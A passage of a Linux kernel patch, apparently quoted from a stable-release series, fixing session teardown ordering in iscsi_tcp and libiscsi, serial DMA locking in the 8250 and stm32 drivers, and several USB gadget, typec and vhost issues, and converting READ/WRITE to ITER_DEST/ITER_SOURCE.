+ 	if (memcpy_hsa_iter(&iter, src, count) < count)
+ 		return -EIO;
+ 	return 0;
+diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
+index 5fb1f364e8155..c3ad04ad66e0a 100644
+--- a/drivers/scsi/iscsi_tcp.c
++++ b/drivers/scsi/iscsi_tcp.c
+@@ -848,7 +848,7 @@ static int iscsi_sw_tcp_host_get_param(struct Scsi_Host *shost,
+ 				       enum iscsi_host_param param, char *buf)
+ {
+ 	struct iscsi_sw_tcp_host *tcp_sw_host = iscsi_host_priv(shost);
+-	struct iscsi_session *session = tcp_sw_host->session;
++	struct iscsi_session *session;
+ 	struct iscsi_conn *conn;
+ 	struct iscsi_tcp_conn *tcp_conn;
+ 	struct iscsi_sw_tcp_conn *tcp_sw_conn;
+@@ -858,6 +858,7 @@ static int iscsi_sw_tcp_host_get_param(struct Scsi_Host *shost,
+ 
+ 	switch (param) {
+ 	case ISCSI_HOST_PARAM_IPADDRESS:
++		session = tcp_sw_host->session;
+ 		if (!session)
+ 			return -ENOTCONN;
+ 
+@@ -958,11 +959,13 @@ iscsi_sw_tcp_session_create(struct iscsi_endpoint *ep, uint16_t cmds_max,
+ 	if (!cls_session)
+ 		goto remove_host;
+ 	session = cls_session->dd_data;
+-	tcp_sw_host = iscsi_host_priv(shost);
+-	tcp_sw_host->session = session;
+ 
+ 	if (iscsi_tcp_r2tpool_alloc(session))
+ 		goto remove_session;
++
++	/* We are now fully setup so expose the session to sysfs. */
++	tcp_sw_host = iscsi_host_priv(shost);
++	tcp_sw_host->session = session;
+ 	return cls_session;
+ 
+ remove_session:
+@@ -982,10 +985,17 @@ static void iscsi_sw_tcp_session_destroy(struct iscsi_cls_session *cls_session)
+ 	if (WARN_ON_ONCE(session->leadconn))
+ 		return;
+ 
++	iscsi_session_remove(cls_session);
++	/*
++	 * Our get_host_param needs to access the session, so remove the
++	 * host from sysfs before freeing the session to make sure userspace
++	 * is no longer accessing the callout.
++	 */
++	iscsi_host_remove(shost, false);
++
+ 	iscsi_tcp_r2tpool_free(cls_session->dd_data);
+-	iscsi_session_teardown(cls_session);
+ 
+-	iscsi_host_remove(shost, false);
++	iscsi_session_free(cls_session);
+ 	iscsi_host_free(shost);
+ }
+ 
+diff --git a/drivers/scsi/libiscsi.c b/drivers/scsi/libiscsi.c
+index d95f4bcdeb2ec..6e811d753cb14 100644
+--- a/drivers/scsi/libiscsi.c
++++ b/drivers/scsi/libiscsi.c
+@@ -3104,17 +3104,32 @@ dec_session_count:
+ }
+ EXPORT_SYMBOL_GPL(iscsi_session_setup);
+ 
+-/**
+- * iscsi_session_teardown - destroy session, host, and cls_session
+- * @cls_session: iscsi session
++/*
++ * issi_session_remove - Remove session from iSCSI class.
+  */
+-void iscsi_session_teardown(struct iscsi_cls_session *cls_session)
++void iscsi_session_remove(struct iscsi_cls_session *cls_session)
+ {
+ 	struct iscsi_session *session = cls_session->dd_data;
+-	struct module *owner = cls_session->transport->owner;
+ 	struct Scsi_Host *shost = session->host;
+ 
+ 	iscsi_remove_session(cls_session);
++	/*
++	 * host removal only has to wait for its children to be removed from
++	 * sysfs, and iscsi_tcp needs to do iscsi_host_remove before freeing
++	 * the session, so drop the session count here.
++	 */
++	iscsi_host_dec_session_cnt(shost);
++}
++EXPORT_SYMBOL_GPL(iscsi_session_remove);
++
++/**
++ * iscsi_session_free - Free iscsi session and it's resources
++ * @cls_session: iscsi session
++ */
++void iscsi_session_free(struct iscsi_cls_session *cls_session)
++{
++	struct iscsi_session *session = cls_session->dd_data;
++	struct module *owner = cls_session->transport->owner;
+ 
+ 	iscsi_pool_free(&session->cmdpool);
+ 	kfree(session->password);
+@@ -3132,10 +3147,19 @@ void iscsi_session_teardown(struct iscsi_cls_session *cls_session)
+ 	kfree(session->discovery_parent_type);
+ 
+ 	iscsi_free_session(cls_session);
+-
+-	iscsi_host_dec_session_cnt(shost);
+ 	module_put(owner);
+ }
++EXPORT_SYMBOL_GPL(iscsi_session_free);
++
++/**
++ * iscsi_session_teardown - destroy session and cls_session
++ * @cls_session: iscsi session
++ */
++void iscsi_session_teardown(struct iscsi_cls_session *cls_session)
++{
++	iscsi_session_remove(cls_session);
++	iscsi_session_free(cls_session);
++}
+ EXPORT_SYMBOL_GPL(iscsi_session_teardown);
+ 
+ /**
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index 5d27f5196de6f..d149b218715e5 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1233,8 +1233,7 @@ static int scsi_probe_and_add_lun(struct scsi_target *starget,
+ 	 * that no LUN is present, so don't add sdev in these cases.
+ 	 * Two specific examples are:
+ 	 * 1) NetApp targets: return PQ=1, PDT=0x1f
+-	 * 2) IBM/2145 targets: return PQ=1, PDT=0
+-	 * 3) USB UFI: returns PDT=0x1f, with the PQ bits being "reserved"
++	 * 2) USB UFI: returns PDT=0x1f, with the PQ bits being "reserved"
+ 	 *    in the UFI 1.0 spec (we cannot rely on reserved bits).
+ 	 *
+ 	 * References:
+@@ -1248,8 +1247,8 @@ static int scsi_probe_and_add_lun(struct scsi_target *starget,
+ 	 * PDT=00h Direct-access device (floppy)
+ 	 * PDT=1Fh none (no FDD connected to the requested logical unit)
+ 	 */
+-	if (((result[0] >> 5) == 1 ||
+-	    (starget->pdt_1f_for_no_lun && (result[0] & 0x1f) == 0x1f)) &&
++	if (((result[0] >> 5) == 1 || starget->pdt_1f_for_no_lun) &&
++	    (result[0] & 0x1f) == 0x1f &&
+ 	    !scsi_is_wlun(lun)) {
+ 		SCSI_LOG_SCAN_BUS(3, sdev_printk(KERN_INFO, sdev,
+ 					"scsi scan: peripheral device type"
+diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
+index ce34a8ad53b4e..12344be14232b 100644
+--- a/drivers/scsi/sg.c
++++ b/drivers/scsi/sg.c
+@@ -1726,7 +1726,7 @@ sg_start_req(Sg_request *srp, unsigned char *cmd)
+ 	Sg_scatter_hold *rsv_schp = &sfp->reserve;
+ 	struct request_queue *q = sfp->parentdp->device->request_queue;
+ 	struct rq_map_data *md, map_data;
+-	int rw = hp->dxfer_direction == SG_DXFER_TO_DEV ? WRITE : READ;
++	int rw = hp->dxfer_direction == SG_DXFER_TO_DEV ? ITER_SOURCE : ITER_DEST;
+ 	struct scsi_cmnd *scmd;
+ 
+ 	SCSI_LOG_TIMEOUT(4, sg_printk(KERN_INFO, sfp->parentdp,
+diff --git a/drivers/target/iscsi/iscsi_target_util.c b/drivers/target/iscsi/iscsi_target_util.c
+index 8d9f21372b674..26dc8ed3045b6 100644
+--- a/drivers/target/iscsi/iscsi_target_util.c
++++ b/drivers/target/iscsi/iscsi_target_util.c
+@@ -1225,7 +1225,7 @@ int rx_data(
+ 		return -1;
+ 
+ 	memset(&msg, 0, sizeof(struct msghdr));
+-	iov_iter_kvec(&msg.msg_iter, READ, iov, iov_count, data);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, iov, iov_count, data);
+ 
+ 	while (msg_data_left(&msg)) {
+ 		rx_loop = sock_recvmsg(conn->sock, &msg, MSG_WAITALL);
+@@ -1261,7 +1261,7 @@ int tx_data(
+ 
+ 	memset(&msg, 0, sizeof(struct msghdr));
+ 
+-	iov_iter_kvec(&msg.msg_iter, WRITE, iov, iov_count, data);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, iov, iov_count, data);
+ 
+ 	while (msg_data_left(&msg)) {
+ 		int tx_loop = sock_sendmsg(conn->sock, &msg);
+diff --git a/drivers/target/target_core_file.c b/drivers/target/target_core_file.c
+index 28aa643be5d5e..7e81a53dbf3ca 100644
+--- a/drivers/target/target_core_file.c
++++ b/drivers/target/target_core_file.c
+@@ -337,7 +337,7 @@ static int fd_do_rw(struct se_cmd *cmd, struct file *fd,
+ 		len += sg->length;
+ 	}
+ 
+-	iov_iter_bvec(&iter, READ, bvec, sgl_nents, len);
++	iov_iter_bvec(&iter, is_write, bvec, sgl_nents, len);
+ 	if (is_write)
+ 		ret = vfs_iter_write(fd, &iter, &pos, 0);
+ 	else
+@@ -473,7 +473,7 @@ fd_execute_write_same(struct se_cmd *cmd)
+ 		len += se_dev->dev_attrib.block_size;
+ 	}
+ 
+-	iov_iter_bvec(&iter, READ, bvec, nolb, len);
++	iov_iter_bvec(&iter, ITER_SOURCE, bvec, nolb, len);
+ 	ret = vfs_iter_write(fd_dev->fd_file, &iter, &pos, 0);
+ 
+ 	kfree(bvec);
+diff --git a/drivers/target/target_core_tmr.c b/drivers/target/target_core_tmr.c
+index bac111456fa1d..2b95b4550a637 100644
+--- a/drivers/target/target_core_tmr.c
++++ b/drivers/target/target_core_tmr.c
+@@ -73,8 +73,8 @@ static bool __target_check_io_state(struct se_cmd *se_cmd,
+ {
+ 	struct se_session *sess = se_cmd->se_sess;
+ 
+-	assert_spin_locked(&sess->sess_cmd_lock);
+-	WARN_ON_ONCE(!irqs_disabled());
++	lockdep_assert_held(&sess->sess_cmd_lock);
++
+ 	/*
+ 	 * If command already reached CMD_T_COMPLETE state within
+ 	 * target_complete_cmd() or CMD_T_FABRIC_STOP due to shutdown,
+diff --git a/drivers/tty/serial/8250/8250_dma.c b/drivers/tty/serial/8250/8250_dma.c
+index b85c82616e8cb..a442f0dfd28e9 100644
+--- a/drivers/tty/serial/8250/8250_dma.c
++++ b/drivers/tty/serial/8250/8250_dma.c
+@@ -44,19 +44,39 @@ static void __dma_rx_complete(void *param)
+ 	struct uart_8250_dma	*dma = p->dma;
+ 	struct tty_port		*tty_port = &p->port.state->port;
+ 	struct dma_tx_state	state;
++	enum dma_status		dma_status;
+ 	int			count;
+ 
+-	dma->rx_running = 0;
+-	dmaengine_tx_status(dma->rxchan, dma->rx_cookie, &state);
++	/*
++	 * New DMA Rx can be started during the completion handler before it
++	 * could acquire port's lock and it might still be ongoing. Don't to
++	 * anything in such case.
++	 */
++	dma_status = dmaengine_tx_status(dma->rxchan, dma->rx_cookie, &state);
++	if (dma_status == DMA_IN_PROGRESS)
++		return;
+ 
+ 	count = dma->rx_size - state.residue;
+ 
+ 	tty_insert_flip_string(tty_port, dma->rx_buf, count);
+ 	p->port.icount.rx += count;
++	dma->rx_running = 0;
+ 
+ 	tty_flip_buffer_push(tty_port);
+ }
+ 
++static void dma_rx_complete(void *param)
++{
++	struct uart_8250_port *p = param;
++	struct uart_8250_dma *dma = p->dma;
++	unsigned long flags;
++
++	spin_lock_irqsave(&p->port.lock, flags);
++	if (dma->rx_running)
++		__dma_rx_complete(p);
++	spin_unlock_irqrestore(&p->port.lock, flags);
++}
++
+ int serial8250_tx_dma(struct uart_8250_port *p)
+ {
+ 	struct uart_8250_dma		*dma = p->dma;
+@@ -130,7 +150,7 @@ int serial8250_rx_dma(struct uart_8250_port *p)
+ 		return -EBUSY;
+ 
+ 	dma->rx_running = 1;
+-	desc->callback = __dma_rx_complete;
++	desc->callback = dma_rx_complete;
+ 	desc->callback_param = p;
+ 
+ 	dma->rx_cookie = dmaengine_submit(desc);
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index b8aed28b8f17b..0e6ef24419c8e 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -798,25 +798,11 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 		spin_unlock(&port->lock);
+ 	}
+ 
+-	if (stm32_usart_rx_dma_enabled(port))
+-		return IRQ_WAKE_THREAD;
+-	else
+-		return IRQ_HANDLED;
+-}
+-
+-static irqreturn_t stm32_usart_threaded_interrupt(int irq, void *ptr)
+-{
+-	struct uart_port *port = ptr;
+-	struct tty_port *tport = &port->state->port;
+-	struct stm32_port *stm32_port = to_stm32_port(port);
+-	unsigned int size;
+-	unsigned long flags;
+-
+ 	/* Receiver timeout irq for DMA RX */
+-	if (!stm32_port->throttled) {
+-		spin_lock_irqsave(&port->lock, flags);
++	if (stm32_usart_rx_dma_enabled(port) && !stm32_port->throttled) {
++		spin_lock(&port->lock);
+ 		size = stm32_usart_receive_chars(port, false);
+-		uart_unlock_and_check_sysrq_irqrestore(port, flags);
++		uart_unlock_and_check_sysrq(port);
+ 		if (size)
+ 			tty_flip_buffer_push(tport);
+ 	}
+@@ -1016,10 +1002,8 @@ static int stm32_usart_startup(struct uart_port *port)
+ 	u32 val;
+ 	int ret;
+ 
+-	ret = request_threaded_irq(port->irq, stm32_usart_interrupt,
+-				   stm32_usart_threaded_interrupt,
+-				   IRQF_ONESHOT | IRQF_NO_SUSPEND,
+-				   name, port);
++	ret = request_irq(port->irq, stm32_usart_interrupt,
++			  IRQF_NO_SUSPEND, name, port);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1602,13 +1586,6 @@ static int stm32_usart_of_dma_rx_probe(struct stm32_port *stm32port,
+ 	struct dma_slave_config config;
+ 	int ret;
+ 
+-	/*
+-	 * Using DMA and threaded handler for the console could lead to
+-	 * deadlocks.
+-	 */
+-	if (uart_console(port))
+-		return -ENODEV;
+-
+ 	stm32port->rx_buf = dma_alloc_coherent(dev, RX_BUF_L,
+ 					       &stm32port->rx_dma_buf,
+ 					       GFP_KERNEL);
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index 1850bacdb5b0e..f566eb1839dc5 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -386,10 +386,6 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 
+ 	uni_mode = use_unicode(inode);
+ 	attr = use_attributes(inode);
+-	ret = -ENXIO;
+-	vc = vcs_vc(inode, &viewed);
+-	if (!vc)
+-		goto unlock_out;
+ 
+ 	ret = -EINVAL;
+ 	if (pos < 0)
+@@ -407,6 +403,11 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 		unsigned int this_round, skip = 0;
+ 		int size;
+ 
++		ret = -ENXIO;
++		vc = vcs_vc(inode, &viewed);
++		if (!vc)
++			goto unlock_out;
++
+ 		/* Check whether we are above size each round,
+ 		 * as copy_to_user at the end of this loop
+ 		 * could sleep.
+diff --git a/drivers/usb/dwc3/dwc3-qcom.c b/drivers/usb/dwc3/dwc3-qcom.c
+index b0a0351d2d8b5..959fc925ca7c5 100644
+--- a/drivers/usb/dwc3/dwc3-qcom.c
++++ b/drivers/usb/dwc3/dwc3-qcom.c
+@@ -901,7 +901,7 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 	qcom->mode = usb_get_dr_mode(&qcom->dwc3->dev);
+ 
+ 	/* enable vbus override for device mode */
+-	if (qcom->mode == USB_DR_MODE_PERIPHERAL)
++	if (qcom->mode != USB_DR_MODE_HOST)
+ 		dwc3_qcom_vbus_override_enable(qcom, true);
+ 
+ 	/* register extcon to override sw_vbus on Vbus change later */
+diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
+index 523a961b910bb..8ad354741380d 100644
+--- a/drivers/usb/gadget/function/f_fs.c
++++ b/drivers/usb/gadget/function/f_fs.c
+@@ -279,8 +279,10 @@ static int __ffs_ep0_queue_wait(struct ffs_data *ffs, char *data, size_t len)
+ 	struct usb_request *req = ffs->ep0req;
+ 	int ret;
+ 
+-	if (!req)
++	if (!req) {
++		spin_unlock_irq(&ffs->ev.waitq.lock);
+ 		return -EINVAL;
++	}
+ 
+ 	req->zero     = len < le16_to_cpu(ffs->ev.setup.wLength);
+ 
+diff --git a/drivers/usb/gadget/function/f_uac2.c b/drivers/usb/gadget/function/f_uac2.c
+index 08726e4c68a56..0219cd79493a7 100644
+--- a/drivers/usb/gadget/function/f_uac2.c
++++ b/drivers/usb/gadget/function/f_uac2.c
+@@ -1142,6 +1142,7 @@ afunc_bind(struct usb_configuration *cfg, struct usb_function *fn)
+ 		}
+ 		std_as_out_if0_desc.bInterfaceNumber = ret;
+ 		std_as_out_if1_desc.bInterfaceNumber = ret;
++		std_as_out_if1_desc.bNumEndpoints = 1;
+ 		uac2->as_out_intf = ret;
+ 		uac2->as_out_alt = 0;
+ 
+diff --git a/drivers/usb/gadget/udc/bcm63xx_udc.c b/drivers/usb/gadget/udc/bcm63xx_udc.c
+index 2cdb07905bdeb..d04d72f5816e6 100644
+--- a/drivers/usb/gadget/udc/bcm63xx_udc.c
++++ b/drivers/usb/gadget/udc/bcm63xx_udc.c
+@@ -1830,7 +1830,6 @@ static int bcm63xx_udc_start(struct usb_gadget *gadget,
+ 	bcm63xx_select_phy_mode(udc, true);
+ 
+ 	udc->driver = driver;
+-	driver->driver.bus = NULL;
+ 	udc->gadget.dev.of_node = udc->dev->of_node;
+ 
+ 	spin_unlock_irqrestore(&udc->lock, flags);
+diff --git a/drivers/usb/gadget/udc/fotg210-udc.c b/drivers/usb/gadget/udc/fotg210-udc.c
+index d0e051beb3af9..693c73e5f61e8 100644
+--- a/drivers/usb/gadget/udc/fotg210-udc.c
++++ b/drivers/usb/gadget/udc/fotg210-udc.c
+@@ -1009,7 +1009,6 @@ static int fotg210_udc_start(struct usb_gadget *g,
+ 	u32 value;
+ 
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	fotg210->driver = driver;
+ 
+ 	/* enable device global interrupt */
+diff --git a/drivers/usb/gadget/udc/fsl_qe_udc.c b/drivers/usb/gadget/udc/fsl_qe_udc.c
+index bf745358e28e6..3b1cc8fa30c83 100644
+--- a/drivers/usb/gadget/udc/fsl_qe_udc.c
++++ b/drivers/usb/gadget/udc/fsl_qe_udc.c
+@@ -2285,7 +2285,6 @@ static int fsl_qe_start(struct usb_gadget *gadget,
+ 	/* lock is needed but whether should use this lock or another */
+ 	spin_lock_irqsave(&udc->lock, flags);
+ 
+-	driver->driver.bus = NULL;
+ 	/* hook up the driver */
+ 	udc->driver = driver;
+ 	udc->gadget.speed = driver->max_speed;
+diff --git a/drivers/usb/gadget/udc/fsl_udc_core.c b/drivers/usb/gadget/udc/fsl_udc_core.c
+index 50435e8041183..a67873a074b7b 100644
+--- a/drivers/usb/gadget/udc/fsl_udc_core.c
++++ b/drivers/usb/gadget/udc/fsl_udc_core.c
+@@ -1943,7 +1943,6 @@ static int fsl_udc_start(struct usb_gadget *g,
+ 	/* lock is needed but whether should use this lock or another */
+ 	spin_lock_irqsave(&udc_controller->lock, flags);
+ 
+-	driver->driver.bus = NULL;
+ 	/* hook up the driver */
+ 	udc_controller->driver = driver;
+ 	spin_unlock_irqrestore(&udc_controller->lock, flags);
+diff --git a/drivers/usb/gadget/udc/fusb300_udc.c b/drivers/usb/gadget/udc/fusb300_udc.c
+index 9af8b415f303b..5954800d652ca 100644
+--- a/drivers/usb/gadget/udc/fusb300_udc.c
++++ b/drivers/usb/gadget/udc/fusb300_udc.c
+@@ -1311,7 +1311,6 @@ static int fusb300_udc_start(struct usb_gadget *g,
+ 	struct fusb300 *fusb300 = to_fusb300(g);
+ 
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	fusb300->driver = driver;
+ 
+ 	return 0;
+diff --git a/drivers/usb/gadget/udc/goku_udc.c b/drivers/usb/gadget/udc/goku_udc.c
+index bdc56b24b5c90..5ffb3d5c635be 100644
+--- a/drivers/usb/gadget/udc/goku_udc.c
++++ b/drivers/usb/gadget/udc/goku_udc.c
+@@ -1375,7 +1375,6 @@ static int goku_udc_start(struct usb_gadget *g,
+ 	struct goku_udc	*dev = to_goku_udc(g);
+ 
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	/*
+diff --git a/drivers/usb/gadget/udc/gr_udc.c b/drivers/usb/gadget/udc/gr_udc.c
+index 22096f8505de4..85cdc0af3bf95 100644
+--- a/drivers/usb/gadget/udc/gr_udc.c
++++ b/drivers/usb/gadget/udc/gr_udc.c
+@@ -1906,7 +1906,6 @@ static int gr_udc_start(struct usb_gadget *gadget,
+ 	spin_lock(&dev->lock);
+ 
+ 	/* Hook up the driver */
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	/* Get ready for host detection */
+diff --git a/drivers/usb/gadget/udc/m66592-udc.c b/drivers/usb/gadget/udc/m66592-udc.c
+index 931e6362a13da..d88871e716623 100644
+--- a/drivers/usb/gadget/udc/m66592-udc.c
++++ b/drivers/usb/gadget/udc/m66592-udc.c
+@@ -1454,7 +1454,6 @@ static int m66592_udc_start(struct usb_gadget *g,
+ 	struct m66592 *m66592 = to_m66592(g);
+ 
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	m66592->driver = driver;
+ 
+ 	m66592_bset(m66592, M66592_VBSE | M66592_URST, M66592_INTENB0);
+diff --git a/drivers/usb/gadget/udc/max3420_udc.c b/drivers/usb/gadget/udc/max3420_udc.c
+index 3074da00c3df7..ddf0ed3eb4f26 100644
+--- a/drivers/usb/gadget/udc/max3420_udc.c
++++ b/drivers/usb/gadget/udc/max3420_udc.c
+@@ -1108,7 +1108,6 @@ static int max3420_udc_start(struct usb_gadget *gadget,
+ 
+ 	spin_lock_irqsave(&udc->lock, flags);
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	udc->driver = driver;
+ 	udc->gadget.speed = USB_SPEED_FULL;
+ 
+diff --git a/drivers/usb/gadget/udc/mv_u3d_core.c b/drivers/usb/gadget/udc/mv_u3d_core.c
+index 598654a3cb418..411b6179782c1 100644
+--- a/drivers/usb/gadget/udc/mv_u3d_core.c
++++ b/drivers/usb/gadget/udc/mv_u3d_core.c
+@@ -1243,7 +1243,6 @@ static int mv_u3d_start(struct usb_gadget *g,
+ 	}
+ 
+ 	/* hook up the driver ... */
+-	driver->driver.bus = NULL;
+ 	u3d->driver = driver;
+ 
+ 	u3d->ep0_dir = USB_DIR_OUT;
+diff --git a/drivers/usb/gadget/udc/mv_udc_core.c b/drivers/usb/gadget/udc/mv_udc_core.c
+index fdb17d86cd656..b397f3a848cf7 100644
+--- a/drivers/usb/gadget/udc/mv_udc_core.c
++++ b/drivers/usb/gadget/udc/mv_udc_core.c
+@@ -1359,7 +1359,6 @@ static int mv_udc_start(struct usb_gadget *gadget,
+ 	spin_lock_irqsave(&udc->lock, flags);
+ 
+ 	/* hook up the driver ... */
+-	driver->driver.bus = NULL;
+ 	udc->driver = driver;
+ 
+ 	udc->usb_state = USB_STATE_ATTACHED;
+diff --git a/drivers/usb/gadget/udc/net2272.c b/drivers/usb/gadget/udc/net2272.c
+index 84605a4d0715f..538c1b9a28835 100644
+--- a/drivers/usb/gadget/udc/net2272.c
++++ b/drivers/usb/gadget/udc/net2272.c
+@@ -1451,7 +1451,6 @@ static int net2272_start(struct usb_gadget *_gadget,
+ 		dev->ep[i].irqs = 0;
+ 	/* hook up the driver ... */
+ 	dev->softconnect = 1;
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	/* ... then enable host detection and ep0; and we're ready
+diff --git a/drivers/usb/gadget/udc/net2280.c b/drivers/usb/gadget/udc/net2280.c
+index d6a68631354a2..1b929c519cd71 100644
+--- a/drivers/usb/gadget/udc/net2280.c
++++ b/drivers/usb/gadget/udc/net2280.c
+@@ -2423,7 +2423,6 @@ static int net2280_start(struct usb_gadget *_gadget,
+ 		dev->ep[i].irqs = 0;
+ 
+ 	/* hook up the driver ... */
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	retval = device_create_file(&dev->pdev->dev, &dev_attr_function);
+diff --git a/drivers/usb/gadget/udc/omap_udc.c b/drivers/usb/gadget/udc/omap_udc.c
+index bea346e362b2b..f660ebfa13799 100644
+--- a/drivers/usb/gadget/udc/omap_udc.c
++++ b/drivers/usb/gadget/udc/omap_udc.c
+@@ -2066,7 +2066,6 @@ static int omap_udc_start(struct usb_gadget *g,
+ 	udc->softconnect = 1;
+ 
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	udc->driver = driver;
+ 	spin_unlock_irqrestore(&udc->lock, flags);
+ 
+diff --git a/drivers/usb/gadget/udc/pch_udc.c b/drivers/usb/gadget/udc/pch_udc.c
+index 9bb7a9d7a2fb2..4f8617210d852 100644
+--- a/drivers/usb/gadget/udc/pch_udc.c
++++ b/drivers/usb/gadget/udc/pch_udc.c
+@@ -2908,7 +2908,6 @@ static int pch_udc_start(struct usb_gadget *g,
+ {
+ 	struct pch_udc_dev	*dev = to_pch_udc(g);
+ 
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	/* get ready for ep0 traffic */
+diff --git a/drivers/usb/gadget/udc/snps_udc_core.c b/drivers/usb/gadget/udc/snps_udc_core.c
+index 52ea4dcf6a927..2fc5d4d277bc4 100644
+--- a/drivers/usb/gadget/udc/snps_udc_core.c
++++ b/drivers/usb/gadget/udc/snps_udc_core.c
+@@ -1933,7 +1933,6 @@ static int amd5536_udc_start(struct usb_gadget *g,
+ 	struct udc *dev = to_amd5536_udc(g);
+ 	u32 tmp;
+ 
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	/* Some gadget drivers use both ep0 directions.
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 1292241d581a6..1cf8947c6d661 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1269,6 +1269,9 @@ err_unregister:
+ 		con->port = NULL;
+ 	}
+ 
++	kfree(ucsi->connector);
++	ucsi->connector = NULL;
++
+ err_reset:
+ 	memset(&ucsi->cap, 0, sizeof(ucsi->cap));
+ 	ucsi_reset_ppm(ucsi);
+@@ -1300,7 +1303,8 @@ static void ucsi_resume_work(struct work_struct *work)
+ 
+ int ucsi_resume(struct ucsi *ucsi)
+ {
+-	queue_work(system_long_wq, &ucsi->resume_work);
++	if (ucsi->connector)
++		queue_work(system_long_wq, &ucsi->resume_work);
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(ucsi_resume);
+@@ -1420,6 +1424,9 @@ void ucsi_unregister(struct ucsi *ucsi)
+ 	/* Disable notifications */
+ 	ucsi->ops->async_write(ucsi, UCSI_CONTROL, &cmd, sizeof(cmd));
+ 
++	if (!ucsi->connector)
++		return;
++
+ 	for (i = 0; i < ucsi->cap.num_connectors; i++) {
+ 		cancel_work_sync(&ucsi->connector[i].work);
+ 		ucsi_unregister_partner(&ucsi->connector[i]);
+diff --git a/drivers/usb/usbip/usbip_common.c b/drivers/usb/usbip/usbip_common.c
+index 053a2bca4c475..f8b326eed54dc 100644
+--- a/drivers/usb/usbip/usbip_common.c
++++ b/drivers/usb/usbip/usbip_common.c
+@@ -309,7 +309,7 @@ int usbip_recv(struct socket *sock, void *buf, int size)
+ 	if (!sock || !buf || !size)
+ 		return -EINVAL;
+ 
+-	iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, size);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, size);
+ 
+ 	usbip_dbg_xmit("enter\n");
+ 
+diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
+index 20265393aee7c..4c538b30fd76d 100644
+--- a/drivers/vhost/net.c
++++ b/drivers/vhost/net.c
+@@ -611,7 +611,7 @@ static size_t init_iov_iter(struct vhost_virtqueue *vq, struct iov_iter *iter,
+ 	/* Skip header. TODO: support TSO. */
+ 	size_t len = iov_length(vq->iov, out);
+ 
+-	iov_iter_init(iter, WRITE, vq->iov, out, len);
++	iov_iter_init(iter, ITER_SOURCE, vq->iov, out, len);
+ 	iov_iter_advance(iter, hdr_size);
+ 
+ 	return iov_iter_count(iter);
+@@ -1184,14 +1184,14 @@ static void handle_rx(struct vhost_net *net)
+ 			msg.msg_control = vhost_net_buf_consume(&nvq->rxq);
+ 		/* On overrun, truncate and discard */
+ 		if (unlikely(headcount > UIO_MAXIOV)) {
+-			iov_iter_init(&msg.msg_iter, READ, vq->iov, 1, 1);
++			iov_iter_init(&msg.msg_iter, ITER_DEST, vq->iov, 1, 1);
+ 			err = sock->ops->recvmsg(sock, &msg,
+ 						 1, MSG_DONTWAIT | MSG_TRUNC);
+ 			pr_debug("Discarded rx packet: len %zd\n", sock_len);
+ 			continue;
+ 		}
+ 		/* We don't need to be notified again. */
+-		iov_iter_init(&msg.msg_iter, READ, vq->iov, in, vhost_len);
++		iov_iter_init(&msg.msg_iter, ITER_DEST, vq->iov, in, vhost_len);
+ 		fixup = msg.msg_iter;
+ 		if (unlikely((vhost_hlen))) {
+ 			/* We will supply the header ourselves
+@@ -1511,6 +1511,9 @@ static long vhost_net_set_backend(struct vhost_net *n, unsigned index, int fd)
+ 	nvq = &n->vqs[index];
+ 	mutex_lock(&vq->mutex);
+ 
++	if (fd == -1)
++		vhost_clear_msg(&n->dev);
++
+ 	/* Verify that ring has been setup correctly. */
+ 	if (!vhost_vq_access_ok(vq)) {
+ 		r = -EFAULT;
+diff --git a/drivers/vhost/scsi.c b/drivers/vhost/scsi.c
+index 7ebf106d50c15..d5ecb8876fc9a 100644
+--- a/drivers/vhost/scsi.c
++++ b/drivers/vhost/scsi.c
+@@ -80,7 +80,7 @@ struct vhost_scsi_cmd {
+ 	struct scatterlist *tvc_prot_sgl;
+ 	struct page **tvc_upages;
+ 	/* Pointer to response header iovec */
+-	struct iovec tvc_resp_iov;
++	struct iovec *tvc_resp_iov;
+ 	/* Pointer to vhost_scsi for our device */
+ 	struct vhost_scsi *tvc_vhost;
+ 	/* Pointer to vhost_virtqueue for the cmd */
+@@ -563,7 +563,7 @@ static void vhost_scsi_complete_cmd_work(struct vhost_work *work)
+ 		memcpy(v_rsp.sense, cmd->tvc_sense_buf,
